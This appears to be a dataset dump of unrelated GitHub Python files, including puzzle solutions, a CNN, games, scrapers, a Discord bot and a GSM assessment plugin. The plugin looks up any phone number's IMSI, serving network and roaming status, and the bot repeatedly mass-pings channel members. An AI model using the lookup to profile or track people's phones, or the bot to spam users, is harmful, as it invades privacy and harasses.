boardSize(img))\nsortFound()\nprintFound()\n\n","repo_name":"chalvors/boggle_matrix_analysis","sub_path":"Boggle.py","file_name":"Boggle.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30522171425","text":"#! 
/usr/bin/env python\n# coding=utf-8\nimport logging, os\nfrom cloghandler import ConcurrentRotatingFileHandler\nfrom logging import handlers\nimport time\n\n\nclass Logger:\n def __init__(self, path, clevel=logging.DEBUG, Flevel=logging.DEBUG, when='M', backCount=5,\n fmt='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'):\n self.logger = logging.getLogger(path)\n self.logger.setLevel(logging.DEBUG)\n fmt = logging.Formatter('%(asctime)s | %(message)s', '%Y-%m-%d %H:%M:%S')\n # fmt = logging.Formatter('%(asctime)s | %(message)s')\n # Use an absolute path to prevent file rotation trouble.\n logfile = os.path.abspath(path)\n # Rotate log after reaching 512K, keep 5 old copies.\n rh = ConcurrentRotatingFileHandler(logfile, \"a\", 10 * 1024 * 1024 * 1024, backCount)\n # th = handlers.TimedRotatingFileHandler(filename=logfile, when=when, backupCount=backCount, encoding='utf-8')\n rh.setFormatter(fmt)\n\n # 设置CMD日志\n sh = logging.StreamHandler()\n sh.setFormatter(fmt)\n sh.setLevel(clevel)\n # 设置文件日志\n fh = logging.FileHandler(path, encoding='utf-8')\n fh.setFormatter(fmt)\n fh.setLevel(Flevel)\n self.logger.addHandler(sh)\n # self.logger.addHandler(fh)\n # self.logger.addHandler(th)\n self.logger.addHandler(rh)\n\n def debug(self, message):\n self.logger.debug(message)\n\n def info(self, message):\n self.logger.info(message)\n\n def war(self, message):\n self.logger.warn(message)\n\n def error(self, message):\n self.logger.error(message)\n\n def cri(self, message):\n self.logger.critical(message)\n\n def collection(self, imei, unique_id, tag_algorithm, recommend_algorithm, hot_word_index, user_tag, similarity,\n recommend_type):\n # 时间 | imei | 唯一id | 标签算法 | 推荐算法 | 热词列表索引 | 用户标签 | 相似度 | 数据类型(1:算法推荐, 2:ctr+original)\n srt = imei + \" | \" + unique_id + \" | \" + tag_algorithm + \" | \" + recommend_algorithm + \\\n \" | \" + hot_word_index + \" | \" + user_tag + \" | \" + similarity + \" | \" + recommend_type\n self.logger.info(srt)\n\n# if 
__name__ == '__main__':\n# logyyx = Logger('./log/all.log', logging.ERROR, logging.DEBUG)\n# index = 1.0\n# while True:\n# index = index + 1\n# imei = \"----\" + str(index) + \"-----\"\n#\n# data_str = imei + \" | \" + \"---唯一id---\" + \" | \" + \"----标签算法----\" + \" | \" + \"---推荐算法----\" + \\\n# \" | \" + \"----热词列表索引 ------\" + \" | \" + \"-----用户标签-----\" + \" | \" + \"-----相似度----\"\n# logyyx.collection(imei, \"--唯一id--\", \"--标签算法--\", \"--推荐算法--\", \"--热词列表索引--\", \"--用户标签--\", \"--相似度--\")\n# time.sleep(0.005)\n","repo_name":"shiquanliao/recommend","sub_path":"app/utils/Logging.py","file_name":"Logging.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29150752860","text":"def metadata(data, start):\n\tchild = data[start]\n\tentries = data[start+1]\n\tsum = 0\n\n\tstart += 2\n\n\tif child == 0:\n\t\tfor i in range(entries):\n\t\t\tsum += data[start+i]\n\telse:\n\t\tnodes = []\n\n\t\tfor i in range(child):\n\t\t\tvalue, start = metadata(data, start)\n\t\t\tnodes.append(value)\n\n\t\tfor i in range(entries):\n\t\t\tj = data[start+i] - 1\n\t\t\tif j < len(nodes):\n\t\t\t\tsum += nodes[j]\n\n\treturn sum, start + entries\n\nwith open('8-in', 'r') as f:\n\tdata = list(map(int, f.read().strip().split()))\n\n\tprint(metadata(data, 0)[0])\n","repo_name":"sspenst/adventofcode2018","sub_path":"8-2.py","file_name":"8-2.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34212472059","text":"import io\nimport sys\n\n_INPUT = \"\"\"\\\n4\n1 2\n4 2\n3 1\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n\n\nn = int(input())\nconnect = [[] for _ in range(n+1)]\nvisited = [False for _ in range(n+1)]\n\nfor i in range(n-1):\n a, b = map(int, input().split())\n connect[a].append(b)\n connect[b].append(a)\n\nfrom collections import deque\nque = deque()\n\nque.append(1)\n\nwhile 
que:\n now = que.popleft()\n\n for to in connect[now]:\n if visited[to] == False:\n visited[to] = True\n\n que.append(to)\n\n print(to)\n\nprint(connect)\nprint(visited)","repo_name":"kkchart9/atcoder","sub_path":"ABC/213_d.py","file_name":"213_d.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25303208280","text":"import os\nfrom contextlib import contextmanager\nfrom typing import List\n\nfrom pip_save.metadata.dependencies import Dependency, VersionedDependency\nfrom pip_save.toml.assemble import parse_toml\nfrom pip_save.toml.model import Root\nfrom pip_save.toml.model import Table\nfrom pip_save.toml.source import InvalidTomlError\nfrom pip_save.toml.writer import to_toml\n\n\nclass Project(object):\n def __init__(self, root=None):\n self._root = root or Root()\n\n if 'deps' not in self._root:\n self._root['deps'] = Table()\n self._deps_table = self._root['deps']\n self.deps = [] # type: List[Dependency]\n for dep_name, dep_metadata in self._root['deps'].items():\n print(dep_name, dep_metadata)\n\n self.dev_deps = [] # type: List[Dependency]\n if 'dev_deps' not in self._root:\n self._root['dev_deps'] = Table()\n self._dev_deps_table = self._root['dev_deps']\n\n def add_dependency(self, dep: Dependency) -> None:\n self.deps.append(dep)\n if isinstance(dep, VersionedDependency):\n self._deps_table[dep.pkg_name] = dep.matcher.specifiers\n\n @classmethod\n def from_toml(cls, text: str) -> 'Project':\n root = parse_toml(text)\n return cls(root=root)\n\n def to_toml(self):\n return to_toml(self._root)\n\n\n\n@contextmanager\ndef build_project_state(fpath):\n if not os.path.exists(fpath):\n raise InvalidTomlError('File {fpath} does not exist. 
Please, run \"{init}\" or create it manually.'\n .format(fpath=fpath,\n init=\"packager init\"))\n\n with open(fpath, 'r') as f:\n text = f.read()\n\n project = Project.from_toml(text)\n\n yield project\n out = project.to_toml()\n\n with open(fpath, 'w') as f:\n f.write(out)\n","repo_name":"mkurnikov/pip-save","sub_path":"pip_save/metadata/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72731396200","text":"import heapq\n# https://www.geeksforgeeks.org/heap-queue-or-heapq-in-python/\n\nfin = open(\"spectacole.txt\")\ns = [line.strip() for line in fin.readlines()]\nn = len(s)\n\nL=[]\n\nfor i in range(n):\n L.append(s[i].split())\n L[i][0] = L[i][0].split(\"-\")\nL.sort()\n\nR=[[L[0]]]\n\nheap = [(L[0][0][1], 0)]\nfor i in range(1,n):\n ver = 0\n if heap[0][0] <= L[i][0][0]:\n popped = heapq.heappop(heap)\n nr_salii = popped[1]\n heapq.heappush(heap, (L[i][0][1], nr_salii))\n R[nr_salii].append(L[i])\n else:\n nr_salii = len(R)\n heapq.heappush(heap, (L[i][0][1], nr_salii))\n R.append([L[i]])\n # for j in range(len(R)):\n # if L[i][0][0] >= R[j][len(R[j])-1][0][1]:\n # R[j].append(L[i])\n # ver = 1\n # break\n # if ver == 0:\n # R.append([L[i]])\n\nprint(len(R))\nfor i in R:\n for j in range(len(i)):\n print(\"({}-{} {})\".format(i[j][0][0],i[j][0][1],i[j][1]), end=\", \" if j < len(i)-1 else \"\\n\")","repo_name":"floricamatei/FMI-Materials","sub_path":"Year I/Semester I/Programarea Algorimilor/Materiale/2022 - 2023/Laboratoare/Grupa 151/Laborator 05/Subgrupa 02/spectacole_heap.py","file_name":"spectacole_heap.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71426695400","text":"import numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\n\n\n\nimport tensorflow as tf\n\nfrom tensorflow import 
keras\n\n\n\nimport os\n\nfrom shutil import copyfile, move\n\nfrom tqdm import tqdm\n\nimport h5py\nprint(tf.__version__)\n\nprint(tf.test.is_gpu_available())\ntraining_df = pd.read_csv(\"../input/train.csv\")\n\ntraining_df.head()\nsrc = \"../input/train/train/\"\n\ndst = \"../sorted_training/\"\n\n\n\nos.mkdir(dst)\n\nos.mkdir(dst+\"true\")\n\nos.mkdir(dst+\"false\")\n\n\n\nwith tqdm(total=len(list(training_df.iterrows()))) as pbar:\n\n for idx, row in training_df.iterrows():\n\n pbar.update(1)\n\n if row[\"has_cactus\"] == 1:\n\n copyfile(src+row[\"id\"], dst+\"true/\"+row[\"id\"])\n\n else:\n\n copyfile(src+row[\"id\"], dst+\"false/\"+row[\"id\"])\nsrc = \"../sorted_training/\"\n\ndst = \"../sorted_validation/\"\n\n\n\nos.mkdir(dst)\n\nos.mkdir(dst+\"true\")\n\nos.mkdir(dst+\"false\")\n\n\n\nvalidation_df = training_df.sample(n=int(len(training_df)/10))\n\n\n\nwith tqdm(total=len(list(validation_df.iterrows()))) as pbar:\n\n for idx, row in validation_df.iterrows():\n\n pbar.update(1)\n\n if row[\"has_cactus\"] == 1:\n\n move(src+\"true/\"+row[\"id\"], dst+\"true/\"+row[\"id\"])\n\n else:\n\n move(src+\"false/\"+row[\"id\"], dst+\"false/\"+row[\"id\"])\nfrom tensorflow.keras.models import Sequential\n\nfrom tensorflow.keras.layers import InputLayer, Input\n\nfrom tensorflow.keras.layers import Conv2D, Dense, Flatten, Dropout, Activation\n\nfrom tensorflow.keras.layers import BatchNormalization, Reshape, MaxPooling2D, GlobalAveragePooling2D\n\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nbatch_size = 64\n\n\n\ntrain_datagen = ImageDataGenerator(\n\n rescale=1. 
/ 255,\n\n horizontal_flip=True,\n\n vertical_flip=True)\n\n\n\ntrain_data_dir = \"../sorted_training\"\n\ntrain_generator = train_datagen.flow_from_directory(\n\n train_data_dir,\n\n shuffle=True,\n\n target_size=(32, 32),\n\n batch_size=batch_size,\n\n class_mode='binary')\n\n\n\n\n\nvalidation_datagen = ImageDataGenerator(rescale=1. / 255)\n\nvalidation_data_dir = \"../sorted_validation\"\n\nvalidation_generator = validation_datagen.flow_from_directory(\n\n validation_data_dir,\n\n target_size=(32, 32),\n\n batch_size=batch_size,\n\n class_mode='binary')\n\n\n\ninput_shape = (32,32,3)\n\nnum_classes = 2\n\ndropout_dense_layer = 0.6\n\n\n\nmodel = Sequential()\n\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\nmodel.add(Conv2D(32, (3, 3)))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\nmodel.add(Conv2D(32, (3, 3)))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\n\nmodel.add(Conv2D(64, (3, 3)))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\nmodel.add(Conv2D(64, (3, 3)))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\nmodel.add(Conv2D(64, (3, 3)))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\n\nmodel.add(Conv2D(128, (3, 3)))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\n\n\nmodel.add(Flatten())\n\nmodel.add(Dense(1024))\n\nmodel.add(Activation('relu'))\n\nmodel.add(Dropout(dropout_dense_layer))\n\n\n\nmodel.add(Dense(256))\n\nmodel.add(Activation('relu'))\n\nmodel.add(Dropout(dropout_dense_layer))\n\n\n\nmodel.add(Dense(1))\n\nmodel.add(Activation('sigmoid'))\nmodel.compile(loss=keras.losses.binary_crossentropy,\n\n optimizer=keras.optimizers.Adam(lr=0.001),\n\n metrics=['accuracy'])\ncallbacks = [EarlyStopping(monitor='val_loss', patience=25),\n\n 
ModelCheckpoint(filepath='best_model.h5', monitor='val_loss', save_best_only=True)]\nepochs = 100\n\nhistory = model.fit_generator(train_generator,\n\n validation_data=validation_generator,\n\n epochs=epochs,\n\n verbose=1,\n\n shuffle=True,\n\n callbacks=callbacks)\nplt.plot(history.history['loss'])\n\nplt.plot(history.history['val_loss'])\n\nplt.show()\nplt.plot(history.history['acc'])\n\nplt.plot(history.history['val_acc'])\n\nplt.show()\nmodel.load_weights(\"best_model.h5\")\ntest_folder = \"../input/test/\"\n\ntest_datagen = ImageDataGenerator(\n\n rescale=1. / 255)\n\n\n\ntest_generator = test_datagen.flow_from_directory(\n\n directory=test_folder,\n\n target_size=(32,32),\n\n batch_size=1,\n\n class_mode='binary',\n\n shuffle=False\n\n)\npred=model.predict_generator(test_generator,verbose=1)\n\npred_binary = [0 if value<0.50 else 1 for value in pred] \ncsv_file = open(\"sample_submission_cnn.csv\",\"w\")\n\ncsv_file.write(\"id,has_cactus\\n\")\n\nfor filename, prediction in zip(test_generator.filenames,pred_binary):\n\n name = filename.split(\"/\")[1].replace(\".tif\",\"\")\n\n csv_file.write(str(name)+\",\"+str(prediction)+\"\\n\")\n\ncsv_file.close()","repo_name":"aorursy/new-nb-3","sub_path":"frlemarchand_simple-cnn-using-keras.py","file_name":"frlemarchand_simple-cnn-using-keras.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70202154921","text":"from turtle import *\ncolor = [\"red\", \"blue\", \"brown\", \"yellow\", \"grey\"]\nfor i in range(5):\n fillcolor(color[i])\n begin_fill()\n for n in range(2):\n forward(100)\n left(90)\n forward(200)\n left(90)\n end_fill()\n 
forward(100)\nmainloop()\n","repo_name":"thewantedx/NguyenQuangHuy-python-c4tb02","sub_path":"session9/turtle_fillcolor.py","file_name":"turtle_fillcolor.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5018827589","text":"# -*- coding: utf-8 -*-\nfrom adapter.hlrlookups_com_adapter import HlrLookupsComAdapter, HlrLookupError\nfrom core.plugin.interface import plugin, PluginBase, arg, cmd, subcmd\n\n\n@plugin(name='HLR Lookup', description='Performs HLR lookup.')\nclass HlrlookupPlugin(PluginBase):\n @cmd(name=\"hlr\", description=\"Lookup a phone number in HLR using hlr-lookup.com.\", parent=True)\n def hlr(self, args):\n pass\n\n @arg('msisdn', action=\"store\", help=\"MSISDN to query (i.e. +43123456789).\")\n @subcmd(name=\"lookup\", help=\"Lookup a phone number in HLR using hlr-lookup.com.\", parent=\"hlr\")\n def hlr_lookup(self, args):\n \"\"\"\n Perform a lookup at hlrlookups.com\n \"\"\"\n adapter = HlrLookupsComAdapter(self._config_provider)\n try:\n result = adapter.lookup(args.msisdn)\n output = \"HLR lookup result for %s (ID: %s):\\n\\n\" % (result['msisdn'], result['id'])\n output += \"Valid: %s\\n\" % result['isvalid']\n output += \"Status: %s\\n\" % result['subscriberstatus']\n output += \"MCC / MNC: %s %s\\n\" % (result['mcc'], result['mnc'])\n output += \"IMSI: %s\\n\" % result['imsi']\n output += \"Network (Country): %s (%s)\\n\" % (result['originalnetworkname'], result['originalcountryname'])\n output += \"Serving MSC / HLR: %s / %s\\n\" % (result['servingmsc'], result['servinghlr'])\n output += \"Is roaming: %s\\n\" % result['isroaming']\n if result['isroaming'] == 'Yes':\n output += \"Roaming Network (Country): %s (%s)\\n\" % (result['roamingnetworkname'],\n result['roamingcountryname'])\n self.printmsg(output)\n\n except HlrLookupError as e:\n self.printmsg(\"ERROR: HLR lookup of %s failed\" % args.msisdn)\n self.printmsg(\"Message was: 
%s\" % e.message)\n\n @subcmd(name='balance', help='Lookup your account balance at hlr-lookup.com.', parent=\"hlr\")\n def hlr_balance(self, args):\n \"\"\"\n Get the current balance in EURO from hlrlookups.com\n \"\"\"\n adapter = HlrLookupsComAdapter(self._config_provider)\n try:\n result = adapter.get_balance()\n self.printmsg(\"Current balance is: EUR %.2f\" % float(result))\n\n except HlrLookupError as e:\n self.printmsg(\"ERROR: HLR balance inquiry failed\")\n self.printmsg(\"Message was: %s\" % e.message)\n","repo_name":"romankh/gsm-assessment-toolkit","sub_path":"plugins/hlrlookup_plugin.py","file_name":"hlrlookup_plugin.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"18"} +{"seq_id":"6563361294","text":"from selenium import webdriver\n\ndriver=webdriver.Firefox()\n# get方法 打开指定网址\ndriver.get('http://www.baidu.com')\nprint(driver.get_cookies())\n# 查找元素\nelement_keyword=driver.find_element_by_id(\"kw\")\n\n# 输入字符\nelement_keyword.send_keys('松勤')\n\n# 找到搜索按钮\nelement_search_button=driver.find_element_by_id(\"su\")\n# 点击该元素\nelement_search_button.click()\n# 退出进程\ndriver.quit()\n\n\n\n","repo_name":"LiuJiYangYang/python-ride","sub_path":"自动化测试学习/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"71696475935","text":"import os\nfrom discord.ext import commands\nfrom utils.argparser import Parser\n\n\nclass everyone(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.parser = Parser()\n self.env = os.getenv\n self.admins = self.env(\"ADMINS\")\n\n @commands.command()\n async def force_everyone(self, ctx):\n if str(ctx.message.author.id) in self.admins:\n mentions = \"PING PING \"\n\n x = ctx.channel.members\n for member in x:\n mention = \"<@\" + str(member.id) + \">\"\n mentions += mention + \" \"\n mentions += \" PING PING 
PING\"\n\n await ctx.message.channel.send(mentions)\n await self.ping_person(ctx, self.env(\"SYMEN_ID\"))\n else:\n await self.no_admin(ctx)\n\n async def no_admin(self, ctx):\n await ctx.message.channel.send(\"Dit mag jij helemaal niet gebruiken BOEF!\")\n for i in range(int(self.env(\"RETURN_SPAM_THRESHOLD\"))):\n await self.ping_person(ctx, ctx.message.author.id)\n\n @commands.command()\n async def everyone(self, ctx):\n await self.everyone_message(ctx)\n\n async def everyone_message(self, ctx, before=\"\", after=\"\"):\n x = ctx.channel.members\n no_ping = self.env(\"NO_PING\")\n mentions = \"PING PING \"\n for member in x:\n if str(member.id) not in no_ping:\n mention = \"<@\" + str(member.id) + \">\"\n mentions += mention + \" \"\n mentions += \" PING PING PING\"\n\n mentions = str(before) + mentions + str(after)\n await ctx.message.channel.send(mentions)\n await self.ping_person(ctx, self.env(\"SYMEN_ID\"))\n\n async def ping_person(self, ctx, person_id, before=\"\", after=\"\"):\n await ctx.message.channel.send(str(before) + \"<@\"+str(person_id)+\">\" + str(after))\n\n @commands.command()\n async def EVERYONE(self, ctx, amount=2):\n over_request = 0\n threshold = int(self.env(\"TAG_THRESHOLD\"))\n if amount > threshold:\n over_request = amount - threshold\n amount = threshold\n\n for i in range(1, amount+1):\n before = \"(\" + str(i) + \"/\" + str(amount) + \"): \"\n await self.everyone_message(ctx, before=before)\n\n for i in range(1, over_request+1):\n before = \"(\" + str(i) + \"/\" + str(over_request) + \"): \"\n await self.ping_person(ctx, ctx.message.author.id, before=before)\n\n @commands.command()\n async def SYMEN(self, ctx, amount=10):\n for i in range(amount):\n await self.ping_person(ctx, self.env(\"SYMEN_ID\"))\n\n @commands.command()\n async def noping(self, ctx):\n no_ping_list = self.env(\"NO_PING\")[1:-1].split(\",\")\n if str(ctx.message.author.id) not in no_ping_list:\n no_ping_list.append(str(ctx.message.author.id))\n write_list = 
\"[\"\n\n for id in no_ping_list:\n write_list += str(id) + \",\"\n write_list = write_list[:-1] + \"]\"\n\n os.environ[\"NO_PING\"] = str(write_list)\n\n @commands.command()\n async def ping(self, ctx):\n no_ping_list = self.env(\"NO_PING\").replace(\" \", \"\")[1:-1].split(\",\")\n\n if str(ctx.message.author.id) in no_ping_list:\n no_ping_list.remove(str(ctx.message.author.id))\n\n write_list = \"[\"\n\n for id in no_ping_list:\n write_list += str(id) + \",\"\n write_list = write_list[:-1] + \"]\"\n\n os.environ[\"NO_PING\"] = str(write_list)\n\n\ndef setup(bot):\n bot.add_cog(everyone(bot))\n\n","repo_name":"bverpaalen/discord_ping_bot","sub_path":"commands/everyone.py","file_name":"everyone.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"72703642014","text":"import pygame\nimport random\nimport sys\nimport time\nimport multiprocessing\nfrom tkinter import *\nfrom tkinter import messagebox\n\nTk().wm_withdraw()\n\nSiGongJoA = pygame.image.load('heroes.png')\npygame.display.set_icon(SiGongJoA)\n\nwidth, height = 640, 480 #화면크기 설정\nhowManySigong = 7 #난이도 설정 (낮을수록 쉽고 높을수록 어렵습니다)\n\nclass Heroes:\n heroes = pygame.image.load('heroes.png')\n heroesSize = heroes.get_rect().size\n heroesX = 0\n heroesY = -height\n heroesSpeed = 7\n\ndef GetHeroesSpeed():\n return random.randrange(7,20)\n \ndef gameover():\n #pygame.mixer.music.stop()\n #배경음악 관련된 코드입니다. 저작권 문제로 깃허브에는 업로드 하지 않겠습니다.\n messagebox.showinfo(\"Game Over\", \"시공속으로 빨려들어갔습니다\\n\\n\\n점수 : %d\" % gamePoint)\n sys.exit()\n\ndef paintEntity(entity, x, y):\n monitor.blit(entity, (x, y))\n\ndef playGame():\n global monitor, person, gamePoint\n gamePoint = 0\n personX = width/2 - (personSize[0]/2)\n dx = 0\n hms = howManySigong\n\n SG = [0] * hms\n '''\n pygame.mixer.music.load('bgm.mp3')\n pygame.mixer.music.play(-1)\n #배경음악 관련된 코드입니다. 
저작권 ���제로 깃허브에는 업로드 하지 않겠습니다.\n '''\n for i in range(0,hms):\n SG[i] = Heroes()\n SG[i].heroesX = random.randrange(0,width-70)\n SG[i].heroesSpeed = random.randrange(5,15)\n \n while True:\n (pygame.time.Clock()).tick(100)\n monitor.fill((50,50,60))\n\n for i in pygame.event.get():\n if i.type in [pygame.QUIT]:\n pygame.quit()\n sys.exit()\n\n if i.type in [pygame.KEYDOWN]:\n if i.key == pygame.K_LEFT:\n dx = -5\n elif i.key == pygame.K_RIGHT:\n dx = +5\n\n if i.type in [pygame.KEYUP]:\n if i.key == pygame.K_LEFT or i.key == pygame.K_RIGHT:\n dx = 0\n\n if (0 < personX + dx and personX + dx <= width - personSize[0]):\n personX += dx\n\n paintEntity(person, personX, height-81)\n\n for i in range(0, hms):\n SG[i].heroesY += SG[i].heroesSpeed\n if SG[i].heroesY > height:\n SG[i].heroesY = -SG[i].heroesSize[0]\n SG[i].heroesX = random.randrange(0,width-SG[i].heroesSize[0])\n SG[i].heroesSpeed = GetHeroesSpeed()\n gamePoint += 1\n\n paintEntity(SG[i].heroes, SG[i].heroesX, SG[i].heroesY)\n if (height - 120 < SG[i].heroesY < height-20):\n if (personX < SG[i].heroesX + 55) and (SG[i].heroesX < personX + 25):\n gameover()\n\n pygame.display.update()\n\nmonitor = None\nperson, personSize = None, 0\n\npygame.init()\nmonitor = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"시.공.시.러!\")\n\nperson = pygame.image.load('person.png')\npersonSize = person.get_rect().size\n\nplayGame()","repo_name":"kdo9921/I-Hate-Heroes","sub_path":"I Hate Heroes.py","file_name":"I Hate Heroes.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"3418697487","text":"import pygame\nimport random\nfrom pygame.sprite import Sprite\n\n\nclass Ship_Explosion(Sprite):\n\t# Explosions when ship die\n\n\tdef __init__(self, screen, ship):\n\t\tsuper(Ship_Explosion,self).__init__()\n\t\tself.screen = screen\n\t\tself.image = 
pygame.image.load('images/explosion/Explosion1.png')\n\t\tself.image1 = pygame.image.load('images/explosion/Explosion1.png')\n\t\tself.image2 = pygame.image.load('images/explosion/Explosion2.png')\n\t\tself.image3 = pygame.image.load('images/explosion/Explosion3.png')\n\t\tself.image4 = pygame.image.load('images/explosion/Explosion4.png')\n\t\tself.image5 = pygame.image.load('images/explosion/Explosion5.png')\n\t\tself.image6 = pygame.image.load('images/explosion/Explosion6.png')\n\t\tself.image7 = pygame.image.load('images/explosion/Explosion7.png')\n\t\tself.rect = self.image1.get_rect()\n\t\tself.rect.centerx = ship.rect.centerx - ship.rect.width/2 + random.randint(0, ship.rect.width)\n\t\tself.rect.centery = ship.rect.centery - ship.rect.height/2 + random.randint(0, ship.rect.height)\n\t\t#self.rect.top = ship.rect.top +10\n\n\t\tself.tick = 0\n\t\t#self.y = float(self.rect.centery)\n\n\t\n\tdef update(self):\n\t\t# Change explosion states\n\t\tself.tick += 1\n\t\tif self.tick == 1:\n\t\t\tself.image = self.image1\n\t\telif self.tick == 2:\n\t\t\tself.image = self.image2\n\t\telif self.tick == 3:\n\t\t\tself.image = self.image3\n\t\telif self.tick == 4:\n\t\t\tself.image = self.image4\n\t\telif self.tick == 5:\n\t\t\tself.image = self.image5\n\t\telif self.tick == 6:\n\t\t\tself.image = self.image6\n\t\telif self.tick == 7:\n\t\t\tself.image = self.image7\t\n\n\tdef draw_ship_explosion(self):\n\t\tself.screen.blit(self.image, self.rect)","repo_name":"ThanhHuy-Le/PyInvaders","sub_path":"ShipExplosion.py","file_name":"ShipExplosion.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28227456516","text":"import requests\nimport time\nimport re, urllib\nimport os\nfrom bs4 import BeautifulSoup\ndef get_web_page(url):\n resp = requests.get(\n url=url,\n cookies={'over18': '1'}\n )\n if resp.status_code != 200:\n print('Invalid url:', resp.url)\n return None\n 
else:\n return resp.text\n\n#‹ 上頁\n\ndef get_articles(dom, date):\n soup = BeautifulSoup(dom, 'html.parser')\n\n articles = [] # 儲存取得的文章資料\n divs = soup.find_all('div', 'r-ent')\n for d in divs:\n date1=date\n date2=str(d.find('div', 'date').string)\n\n\n #if d.find('div', 'date').string == date: # 發文日期正確\n if date1 == date2.lstrip(): # 發文日期正確\n # 取得推文數\n push_count = 0\n if d.find('div', 'nrec').string:\n try:\n push_count = int(d.find('div', 'nrec').string) # 轉換字串為數字\n except ValueError: # 若轉換失敗,不做任何事,push_count 保持為 0\n pass\n\n # 取得文章連結及標題\n if d.find('a'): # 有超連結,表示文章存在,未被刪除\n href = d.find('a')['href']\n title = d.find('a').string\n articles.append({\n 'title': title,\n 'href': href,\n 'push_count': push_count\n })\n return articles\n\n\ndef parse(dom):\n soup = BeautifulSoup(dom, 'html.parser')\n links = soup.find(id='main-content').find_all('a')\n img_urls = []\n for link in links:\n if re.match(r'^https?://(i.)?(m.)?imgur.com', link['href']):\n img_urls.append(link['href'])\n return img_urls\n\ndef save(img_urls, title):\n if img_urls:\n try:\n dname = title.strip() # 用 strip() 去除字串前後的空白\n os.makedirs(dname)\n for img_url in img_urls:\n print(\"cs path:\"+img_url)\n if img_url.split('//')[1].startswith('m.'):\n img_url = img_url.replace('//m.', '//i.')\n if not img_url.split('//')[1].startswith('i.'):\n img_url = img_url.split('//')[0] + '//i.' 
+ img_url.split('//')[1]\n if not img_url.endswith('.jpg'):\n img_url += '.jpg'\n fname = img_url.split('/')[-1]\n urllib.request.urlretrieve(img_url, os.path.join(dname, fname))\n except Exception as e:\n print(e)\n\n\nPTT_URL = 'https://www.ptt.cc'\n\npage = get_web_page('https://www.ptt.cc/bbs/Beauty/index.html')\nif page:\n date = time.strftime(\"%m/%d\").lstrip('0') # 今天日期, 去掉開頭的 '0' 以符合 PTT 網站格式\n print(\"today: \"+date)\n current_articles = get_articles(page, date)\n for article in current_articles:\n print(\"CS No:\"+str(article['push_count']))\n if article[\"push_count\"] >10:\n page = get_web_page(PTT_URL + article['href'])\n if page:\n img_urls = parse(page)\n save(img_urls, article['title'])\n article['num_image'] = len(img_urls)\n","repo_name":"bobyme/2018_04_08_PythonWebCrawler","sub_path":"04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"12537891645","text":"#ejercicio 1: Imprimir en pantalla los números pares del 1 al 500\n#ejercicio 2: Imprimir en pantalla los numeros primos del 1 al 100\n\n\"\"\"contador = 2\nwhile contador <=498:\n print(contador)\n contador +=2\nprint(contador)\"\"\"\n\n'''contador = 1'''\n\n\"\"\"for num in range(1,501):\n #print(num)\n if num % 2 == 0:\n print(num)\"\"\"\n\n\"\"\"for num in range(1,500):\n if num % 2 == 0:\n print(num)\"\"\"\n \ncontador = 1\nlimite = 100\nfor a in range(1, limite+1):\n c = 0\n for b in range(1, contador+1):\n a = contador % b\n if a == 0:\n c = c +1\n if c == 2:\n print(contador)\n else:\n a = a -1\n contador += 1\n \n","repo_name":"oscarjuela/workspace","sub_path":"curso_python/viernes_11/ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"17445877342","text":"import os\nfrom scipy.io import wavfile\n\nseconds = 
